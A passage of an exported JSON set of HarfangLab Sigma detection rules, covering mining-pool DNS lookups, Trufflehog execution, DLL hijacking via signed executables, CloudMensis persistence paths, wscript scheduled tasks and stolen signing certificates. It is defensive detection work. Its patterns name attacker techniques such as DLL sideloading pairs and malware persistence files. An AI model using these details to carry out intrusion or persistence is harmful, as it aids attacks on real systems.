'raptoreum.zone'\n - 'raptorhash.com'\n - 'ravenminer.com'\n - 'rplant.xyz'\n - 'semipool.com'\n - 'skypool.org'\n - 'solopool.org'\n - 'sunpool.top'\n - 'supportxmr.com'\n - 'suprnova.cc'\n - 'unmineable.com'\n - 'uupool.cn'\n - 'volt-mine.com'\n - 'woolypooly.com'\n - 'xmrpool.eu'\n - 'zergpool.com'\n - 'zeropool.io'\n - 'zpool.ca'\n\n exclusion_resolver:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k NetworkService -p -s Dnscache'\n\n exclusion_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n exclusion_svchost_sharedaccess:\n ProcessCommandLine: '?:\\Windows\\System32\\svchost.exe -k netsvcs -p -s SharedAccess'\n\n exclusion_mcafee:\n ProcessImage: '?:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_kaspersky:\n ProcessOriginalFileName: 'avp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kaspersky Lab JSC'\n\n exclusion_nexthink:\n # C:\\Program Files\\Nexthink\\Collector\\Collector\\nxtsvc.exe\n ProcessOriginalFileName: 'nxtsvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NEXThink S.A.'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\program files (x86)\\'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a596512c-c042-4d93-aa3b-bcd10e987acb",
"rule_name": "DNS Request to Cryptocurrency Mining Pool (Windows)",
"rule_description": "Detects a DNS resolution request for a known cryptocurrency mining pool website.\nA mining pool is a joint group of cryptocurrency miners who combine resources over a network to find blocks quicker and share coins.\nThis may be an indicator of hidden or covert mining programs in a system making requests to crypto pooling websites.\nIt is recommended to investigate the process performing this request to determine its legitimacy.\n",
"rule_creation_date": "2023-04-06",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a5980fd1-5944-47d7-a1df-560ad4ada0b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070744Z",
"creation_date": "2026-03-23T11:45:34.070746Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070751Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/trufflesecurity/trufflehog",
"https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm",
"https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/",
"https://attack.mitre.org/techniques/T1552/"
],
"name": "t1552_trufflehog_executed_macos.yml",
"content": "title: Trufflehog Executed (macOS)\nid: a5980fd1-5944-47d7-a1df-560ad4ada0b3\ndescription: |\n Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\n This tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\n The Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\n It is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\nreferences:\n - https://github.com/trufflesecurity/trufflehog\n - https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm\n - https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/\n - https://attack.mitre.org/techniques/T1552/\ndate: 2025/11/26\nmodified: 2025/11/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.credential_access\n - attack.t1552\n - attack.collection\n - attack.t1213\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Trufflehog\n - classification.macOS.Behavior.Discovery\n - classification.macOS.Behavior.CredentialAccess\n - classification.macOS.Behavior.Collection\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/trufflehog'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a5980fd1-5944-47d7-a1df-560ad4ada0b3",
"rule_name": "Trufflehog Executed (macOS)",
"rule_description": "Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\nThis tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\nThe Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\nIt is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\n",
"rule_creation_date": "2025-11-26",
"rule_modified_date": "2025-11-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083",
"attack.t1213",
"attack.t1552"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a5a5daeb-19c0-4205-a23e-a08d3c70ee46",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094085Z",
"creation_date": "2026-03-23T11:45:34.094087Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094091Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_directxdatabaseupdater.yml",
"content": "title: DLL Hijacking via DirectXDatabaseUpdater.exe\nid: a5a5daeb-19c0-4205-a23e-a08d3c70ee46\ndescription: |\n Detects potential Windows DLL Hijacking via DirectXDatabaseUpdater.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DirectXDatabaseUpdater.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dismapi.dll'\n - '\\npmproxy.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a5a5daeb-19c0-4205-a23e-a08d3c70ee46",
"rule_name": "DLL Hijacking via DirectXDatabaseUpdater.exe",
"rule_description": "Detects potential Windows DLL Hijacking via DirectXDatabaseUpdater.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a5c40b82-e29e-4791-a063-9fb90ce0d69d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617765Z",
"creation_date": "2026-03-23T11:45:34.617766Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617771Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/",
"https://attack.mitre.org/versions/v11/techniques/T1543/004/"
],
"name": "cloudmensis_malware.yml",
"content": "title: Suspicious Command-Line related to CloudMensis\nid: a5c40b82-e29e-4791-a063-9fb90ce0d69d\ndescription: |\n Detects suspicious command line arguments associated with CloudMensis malware.\n CloudMensis is a macOS malware that leverages cloud storage as its command and control (C2) channel, exfiltrating sensitive information such as documents, keystrokes, and screen captures from compromised systems.\n It is recommended to inspect the content of the plist file and the process launching the suspicious command.\nreferences:\n - https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/\n - https://attack.mitre.org/versions/v11/techniques/T1543/004/\ndate: 2023/07/11\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Malware.CloudMensis\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n CommandLine|contains:\n # CloudMensis preferences\n - '/Library/Preferences/com.apple.iTunesInfo28.plist'\n - '/Library/Preferences/com.apple.iTunesInfo29.plist'\n # /Users//Library/Preferences/com.apple.iTunesInfo.plist\n - '/Library/Preferences/com.apple.iTunesInfo.plist'\n # /Users//Library/LaunchAgents/.com.apple.loginwindow.plist\n - '/Library/LaunchAgents/.com.apple.loginwindow.plist'\n # /Users//Library/LaunchAgents/.com.apple.softwareupdate.plist\n - '/Library/LaunchAgents/.com.apple.softwareupdate.plist'\n # CloudMensis hidden daemon\n - '/Library/LaunchDaemons/.com.apple.WindowServer.plist'\n\n # CloudMensis binaries path\n - '/Library/Containers/com.apple.FaceTime/Data/Library/windowserver'\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a5c40b82-e29e-4791-a063-9fb90ce0d69d",
"rule_name": "Suspicious Command-Line related to CloudMensis",
"rule_description": "Detects suspicious command line arguments associated with CloudMensis malware.\nCloudMensis is a macOS malware that leverages cloud storage as its command and control (C2) channel, exfiltrating sensitive information such as documents, keystrokes, and screen captures from compromised systems.\nIt is recommended to inspect the content of the plist file and the process launching the suspicious command.\n",
"rule_creation_date": "2023-07-11",
"rule_modified_date": "2025-03-31",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1543.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a618be30-2183-4bab-b5f6-42f4657a8a45",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084495Z",
"creation_date": "2026-03-23T11:45:34.084497Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084501Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/",
"https://attack.mitre.org/techniques/T1059/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_suspicious_script_scheduled_task.yml",
"content": "title: Suspicious Wscript Scheduled Task Created\nid: a618be30-2183-4bab-b5f6-42f4657a8a45\ndescription: |\n Detects the creation of scheduled tasks that execute scripts through wscript.exe via command-line.\n This technique is frequently abused by attackers to maintain persistence by scheduling malicious script execution at regular intervals or system events.\n While scheduled tasks are common, those invoking wscript directly warrant investigation.\n It is recommended to investigate scheduled tasks executing wscript.exe, analyze the associated script contents for malicious code, and remove unauthorized tasks while reviewing historical execution patterns.\nreferences:\n - https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/\n - https://attack.mitre.org/techniques/T1059/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2024/05/13\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.Wscript\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\schtasks.exe'\n - OriginalFileName: 'schtasks.exe'\n selection_action:\n CommandLine|contains:\n - '/create '\n - '-create '\n selection_name:\n CommandLine|contains:\n - '/tn '\n - '-tn '\n selection_scripting_engine:\n CommandLine|contains:\n - 'cscript '\n - 'cscript.exe '\n - 'wscript '\n - 'wscript.exe '\n\n exclusion_vda_cloning_orchestrator:\n CommandLine|contains: 'VDA Cloning Orchestrator'\n\n exclusion_ojdkbuild:\n CommandLine|contains|all:\n - 'ojdkbuild_jdk_update_checker'\n - '?:\\Program Files\\ojdkbuild\\java-*\\update\\checker.vbs'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a618be30-2183-4bab-b5f6-42f4657a8a45",
"rule_name": "Suspicious Wscript Scheduled Task Created",
"rule_description": "Detects the creation of scheduled tasks that execute scripts through wscript.exe via command-line.\nThis technique is frequently abused by attackers to maintain persistence by scheduling malicious script execution at regular intervals or system events.\nWhile scheduled tasks are common, those invoking wscript directly warrant investigation.\nIt is recommended to investigate scheduled tasks executing wscript.exe, analyze the associated script contents for malicious code, and remove unauthorized tasks while reviewing historical execution patterns.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-08-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1059"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a634e7a2-5d0a-4686-a230-17b8fb969926",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080925Z",
"creation_date": "2026-03-23T11:45:34.080927Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080932Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/WhichbufferArda/status/1566395376252379137",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rastls.yml",
"content": "title: DLL Hijacking via RawTls.exe\nid: a634e7a2-5d0a-4686-a230-17b8fb969926\ndescription: |\n Detects potential Windows DLL Hijacking via RawTls.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Symantec executable and placing a malicious RawTls.dll file alongside.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/WhichbufferArda/status/1566395376252379137\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/07\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dot1xtra.exe'\n ProcessSignature: 'Symantec Corporation'\n ImageLoaded|endswith: '\\RasTls.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Symantec\\\\*\\bin\\'\n - '?:\\Program Files (x86)\\Symantec\\\\*\\bin\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a634e7a2-5d0a-4686-a230-17b8fb969926",
"rule_name": "DLL Hijacking via RawTls.exe",
"rule_description": "Detects potential Windows DLL Hijacking via RawTls.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Symantec executable and placing a malicious RawTls.dll file alongside.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a69afc09-359a-4fbc-ae4c-77637f5258fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628212Z",
"creation_date": "2026-03-23T11:45:34.628214Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628219Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/",
"https://attack.mitre.org/techniques/T1069/001/",
"https://attack.mitre.org/techniques/T1069/002/"
],
"name": "t1069_001_net_localgroup.yml",
"content": "title: Group Content Discovered\nid: a69afc09-359a-4fbc-ae4c-77637f5258fc\ndescription: |\n Detects the execution of 'net localgroup ' or 'net group '.\n This is often used by attackers to discover the content of the groups locally or in the domain.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1069/002/\ndate: 2022/12/01\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1069.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_2:\n CommandLine|contains:\n - ' localgroup'\n - ' group'\n\n # This is handled by the rules\n filter_command:\n CommandLine|contains:\n - '/add'\n - '/delete'\n - '/del'\n filter_admin:\n CommandLine|contains: 'admin'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a69afc09-359a-4fbc-ae4c-77637f5258fc",
"rule_name": "Group Content Discovered",
"rule_description": "Detects the execution of 'net localgroup ' or 'net group '.\nThis is often used by attackers to discover the content of the groups locally or in the domain.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-10-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.001",
"attack.t1069.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a6b56b83-9dfb-45a3-ad2d-9f468b0f6386",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070428Z",
"creation_date": "2026-03-23T11:45:34.070430Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070434Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_hacking_team_stolen_cert_image_load.yml",
"content": "title: Image Loaded Signed with Hacking Team Certificate\nid: a6b56b83-9dfb-45a3-ad2d-9f468b0f6386\ndescription: |\n Detects the loading of an image signed with Hacking Team's certificates.\n HackingTeam is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\n This can be the sign of a malware using a fake signature to evade AV/EDR detection.\n It is recommended to analyze the binary to search for malicious contents.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2023/07/13\nmodified: 2025/01/21\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.StolenCertificate\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n ImageSignatureSignerThumbprint:\n - '2A1DA6DC8635E6C725CCCBE6C035EEC813FBEB2E' # Certum Level III CA - Open Source Developer, William Zoltan\n - '6C5886C0DA723E8B2AEC8C02392D4B175E793EBE' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B366DBE8B3E81915CA5C5170C65DCAD8348B11F0' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B7C646E3A433986E165BA45B209DA4A2C4111939' # Certum Code Signing CA - Luca Marcone\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a6b56b83-9dfb-45a3-ad2d-9f468b0f6386",
"rule_name": "Image Loaded Signed with Hacking Team Certificate",
"rule_description": "Detects the loading of an image signed with Hacking Team's certificates.\nHackingTeam is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\nThis can be the sign of a malware using a fake signature to evade AV/EDR detection.\nIt is recommended to analyze the binary to search for malicious contents.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2025-01-21",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a6cace98-683f-4957-8835-f651ff11941e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089434Z",
"creation_date": "2026-03-23T11:45:34.089436Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089440Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bleepingcomputer.com/news/security/malware-force-installs-chrome-extensions-on-300-000-browsers-patches-dlls/",
"https://www.connectwise.com/blog/threat-report/smash-jacker",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_malicious_chrome_extensions_forceinstall.yml",
